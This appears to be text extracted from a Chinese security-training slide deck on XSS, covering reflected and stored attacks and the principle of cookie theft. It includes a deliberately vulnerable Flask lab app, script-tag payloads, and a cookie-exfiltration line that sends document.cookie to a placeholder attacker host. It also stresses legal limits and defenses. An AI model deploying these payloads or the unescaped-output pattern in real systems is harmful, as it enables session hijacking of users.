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同根：用户输入参与"代码"解析；不同：SQL 注入由数据库解析、攻服务器数据，XSS 由浏览器解析、攻页面用户。
2. payload 是否持久化：反射型随请求反射、需诱导点击、打单个受害者；存储型入库驻留、自动命中所有浏览者，危害更大。
3. 输入被原样拼进响应 HTML，浏览器解析时把 &lt;script&gt; 当标签执行其中 JS —— 输入本应是文字，却成了代码。
4. 读取（document.cookie）→ 外传（图片请求等）→ 冒用（携 cookie 复用会话）；HttpOnly 让 JS 读不到 cookie，第一环即断。
5. XSS 的战场在输出：入库安全不代表输出安全，渲染时必须转义/编码，两层防御缺一不可。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同根：用户输入参与"代码"解析；不同：SQL 注入由数据库解析、攻服务器数据，XSS 由浏览器解析、攻页面用户。
2. payload 是否持久化：反射型随请求反射、需诱导点击、打单个受害者；存储型入库驻留、自动命中所有浏览者，危害更大。
3. 输入被原样拼进响应 HTML，浏览器解析时把 &lt;script&gt; 当标签执行其中 JS —— 输入本应是文字，却成了代码。
4. 读取（document.cookie）→ 外传（图片请求等）→ 冒用（携 cookie 复用会话）；HttpOnly 让 JS 读不到 cookie，第一环即断。
5. XSS 的战场在输出：入库安全不代表输出安全，渲染时必须转义/编码，两层防御缺一不可。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原理：反射型、存储型与 cookie 窃取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XSS 成因：用户输入被拼进 HTML，浏览器把它当代码执行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在靶场完成反射型 XSS：URL 参数中的 &lt;script&gt; 被页面原样输出并弹窗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在靶场完成存储型 XSS：留言写入数据库，每个访客都会执行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区分反射型与存储型：一次点击 vs 长期驻留，攻击面差异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拆解 cookie 窃取原理：document.cookie 读取 + 外传思路（仅在靶场理解）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 XSS 危害做完整分析：会话劫持、钓鱼、键盘记录、蠕虫传播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是最常见的 Web 漏洞之一：只要页面会把输入"回显"，就可能中招 —— 你的靶场今天就有两处。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注入攻击服务器，XSS 攻击"每一个来访的用户"：受害者从服务器变成了人。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理解窃取原理才能理解 Day 068 的防御组合拳：转义、CSP、HttpOnly 各挡哪一段。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知识地图：XSS 原理：反射型、存储型与 cookie 窃取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输入拼进HTML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反射型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URL参数回显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留言驻留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payload拆解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&lt;script&gt;执行链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cookie窃取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document.cookie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危害+红线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只打靶场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本日定位：在自己的靶场复现反射型 XSS 与存储型 XSS，拆解 &lt;script&gt;alert(1)&lt;/script&gt; 的执行链，理解 cookie 窃取原理与真实危害。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XSS 原理：反射型、存储型与 cookie 窃取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成因：浏览器把"输入"当"代码"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是代码：如果用户输入被原样写进页面，&lt;script&gt; 就会被浏览器执行。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SQL 注入同构：都是"数据变代码"，只是解析器从数据库换成了浏览器。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注入面盘点：URL 参数、表单字段、HTTP 头回显处 —— 凡"输入→输出"都可能中招。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靶场实验准备：给 app_vuln.py 加一个 /search?q= 页面，把 q 原样拼进响应 HTML。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验证方法：payload 触发后浏览器弹窗 alert(1) 即执行成功（靶场专用，仅证明存在）。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app_vuln.py 追加段（可运行）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追加到 app_vuln.py —— 故意不安全的搜索页（漏洞演示用）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@app.route("/search")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search():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q = request.args.get("q",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【漏洞点】用户输入原样拼进 HTML —— 未做任何转义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f"&lt;h2&gt;搜索结果&lt;/h2&gt;&lt;p&gt;你搜索了: {q} ，未找到匹配。&lt;/p&gt;"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测试：http://127.0.0.1:5000/search?q=hello       -&gt; 正常回显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攻击：http://127.0.0.1:5000/search?q=&lt;script&gt;alert(1)&lt;/script&gt;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-&gt; 页面里出现真的 &lt;script&gt; 标签 -&gt; 浏览器执行 -&gt; 弹出 1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XSS（跨站脚本 Cross-Site Scripting）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注入的脚本在受害者浏览器里、以站点域身份执行。缩写故意写成 XSS 以区别于 CSS。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法律红线：以下所有 payload 只允许发给你 127.0.0.1 的靶场；向他人发送含脚本的链接即属违法。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反射型 XSS：请求即执行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特点：payload 在 URL/请求里，服务器"反射"回响应，浏览器当场执行。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一次性：谁点开恶意链接谁中招，不点不中 —— 攻击者必须诱导点击。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投放方式（概念）：聊天消息、评论区贴链接，诱使受害者点开。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靶场实验：直接访问 /search?q=&lt;script&gt;alert(1)&lt;/script&gt;，观察弹窗。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 payload：alert(document.cookie) —— 弹出当前域 cookie，为窃取原理做铺垫。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step2_反射型实验.txt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反射型实验记录（靶场 127.0.0.1:5000）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正常回显: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GET /search?q=hello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响应: &lt;p&gt;你搜索了: hello ，未找到匹配。&lt;/p&gt;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注入执行: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GET /search?q=&lt;script&gt;alert(1)&lt;/script&gt;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响应: &lt;p&gt;你搜索了: &lt;script&gt;alert(1)&lt;/script&gt; ，未找到匹配。&lt;/p&gt;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└────────── 浏览器按 HTML 解析，&lt;script&gt; 不再是"文字" ──────────┘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读取 cookie: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GET /search?q=&lt;script&gt;alert(document.cookie)&lt;/script&gt;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弹窗显示当前域下非 HttpOnly 的全部 cookie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真实攻击 = 把第 2 步的 URL 发给受害者点开（本课程只在靶场内自发自收）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为什么弹窗就算漏洞？alert(1) 只证明"任意 JS 执行"成立；把 alert 换成任何恶意逻辑，后果同级别。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存储型 XSS：一次注入，人人中招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 被存进数据库（如留言板），之后每个浏览该页的访客都会执行。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对比反射型：无需诱导每次点击 —— 恶意内容"住"在页面里，自动化命中。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靶场实验：给靶场加最简留言板 /board，存入 SQLite，原样输出每条留言。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注入一条 &lt;script&gt;alert('stored')&lt;/script&gt;，再开新标签页正常访问 —— 依然弹窗。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危害升级：存储型常被做成蠕虫（payload 再去发新 payload），社交平台历史案例多次爆发。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app_vuln.py 追加段（可运行）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追加到 app_vuln.py —— 故意不安全的留言板（漏洞演示用）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db():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con.execute("CREATE TABLE IF NOT EXISTS msgs (id INTEGER PRIMARY KEY, content TEXT)")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con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@app.route("/board",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board():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content = request.form.get("content",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 = db(); con.execute("INSERT INTO msgs(content) VALUES (?)", (content,)); con.commit();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# 注意：写库用了参数化（这点是对的），但【输出】没有转义 —— XSS 在输出侧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db().execute("SELECT id, content FROM msgs").fetchall()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html = "&lt;h2&gt;留言板（漏洞版）&lt;/h2&gt;&lt;form method='post'&gt;&lt;input name='content'&gt;&lt;button&gt;发&lt;/button&gt;&lt;/form&gt;"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mid, c in rows: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html += f"&lt;p&gt;#{mid}: {c}&lt;/p&gt;"      # 【漏洞点】留言内容原样拼进 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实验顺序：发布正常留言 -&gt; 发布 &lt;script&gt;alert('stored')&lt;/script&gt;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-&gt; 新标签页重新打开 /board -&gt; 弹窗仍在（每个访客都中）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留意一个细节：入库用参数化防住了 SQL 注入，但输出未转义仍中 XSS —— 两种漏洞要分别设防。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 拆解、cookie 窃取原理与危害分析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&lt;script&gt; 标签：告诉浏览器"接下来是 JS 代码"，这是执行入口。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alert(1)：仅是"存在证明"，真实攻击里替换为任意逻辑 —— 所以危害上限极高。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窃取原理三步：JS 读 document.cookie -&gt; new Image().src='http://attacker/?c='+cookie 外传 -&gt; 攻击者用 cookie 冒充受害者（会话劫持）。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HttpOnly cookie 的意义：JS 读不到，窃取链条第一环即断（Day 068 实操）。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危害全景：会话劫持、暗藏表单钓鱼、键盘记录、蠕虫；法律声明：以上仅限靶场理解，向外发送即违法。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step4_payload拆解与红线.txt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payload 逐段拆解（理解用，本课程不搭建接收端）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&lt;script&gt;alert(1)&lt;/script&gt;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└─┬─┘  └─┬─┘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标签入口  执行代码（存在证明）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窃取原理三步（靶场内演示读取即可，不外传）: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1) document.cookie           -&gt; 读当前域可见 cookie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2) new Image().src='...?c='  -&gt; 借图片请求把数据带出（跨域外传思路）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3) 攻击者拿 cookie 直接冒充受害者访问站点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法律红线 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1 步在靶场做是学习；向任何真实站点/他人注入以上脚本，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或搭建接收端收集真实用户 cookie，均属违法（刑法 285/286 条）。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=====================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 窃取链的三环：读取 -&gt; 外传 -&gt; 冒用。Day 068 的 HttpOnly 断第一环，CSP 断外传，转义断根本。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与 SQL 注入的相同点和不同点？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反射型和存储型 XSS 的关键区别？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&lt;script&gt;alert(1)&lt;/script&gt; 为什么能执行？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 窃取链条是哪三步？哪一步被 HttpOnly 阻断？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为什么留言板"参数化入库"了还是中了 XSS？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原理：反射型、存储型与 cookie 窃取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在靶场复现反射型与存储型 XSS，读取 cookie，理清窃取链条并记录每步原理。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app_vuln.py 加 /search 与 /board 两个页面（代码见课件），重启靶场。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反射型：访问 /search?q=&lt;script&gt;alert(1)&lt;/script&gt;，确认弹窗；再换 alert(document.cookie) 弹出 cookie。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存储型：在 /board 正常留言一条，再注入 &lt;script&gt;alert('stored')&lt;/script&gt;，确认发出去的留言出现在页面。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新开标签页访问 /board，确认弹窗依然触发 —— 体会"每个访客都中招"。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写笔记：画出窃取链三步（读取/外传/冒用），标注 HttpOnly、CSP、转义各自能断哪一环（明天验证）。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反射型 XSS 在 /search 弹窗成功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存储型 XSS 驻留 /board，新会话仍触发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能默写窃取链三步并指出三种防御的断点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与 SQL 注入的相同点和不同点？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提示：相同：数据变代码；不同：谁在解析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反射型和存储型 XSS 的关键区别？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&lt;script&gt;alert(1)&lt;/script&gt; 为什么能执行？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 窃取链条是哪三步？哪一步被 HttpOnly 阻断？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为什么留言板"参数化入库"了还是中了 XSS？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/search 再构造 2 个不同思路的弹窗 payload（如 &lt;img onerror&gt;、&lt;svg onload&gt;），记录"不写 &lt;script&gt; 也能执行"的证据。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在靶场加 /profile?name= 页面，先复现反射型 XSS，明天用它做修复对比。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笔记整理：反射型 vs 存储型 vs DOM 型（查资料补充第三类），各一行定义 + 一个 payload 示例。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预习思考：Jinja2 的 {{ }} 输出和 f-string 拼接，谁安全谁危险？为什么？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反射型 XSS 在 /search 弹窗成功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存储型 XSS 驻留 /board，新会话仍触发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能默写窃取链三步并指出三种防御的断点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XSS 原理：反射型、存储型与 cookie 窃取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 · SQL 注入防御：参数化查询与纵深防线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XSS 防御：Jinja2 自动转义、|safe 的危险、CSP 与 HttpOnly，动手修靶场。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067 · XSS 原理：反射型、存储型与 cookie 窃取</dc:title>
  <dc:subject>Day 067 · XSS 原理：反射型、存储型与 cookie 窃取</dc:subject>
  <dc:creator>0基础计算机与网络安全工程师训练营</dc:creator>
  <cp:lastModifiedBy>0基础计算机与网络安全工程师训练营</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-09T23:14:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-09T23:14:30Z</dcterms:modified>
</cp:coreProperties>
</file>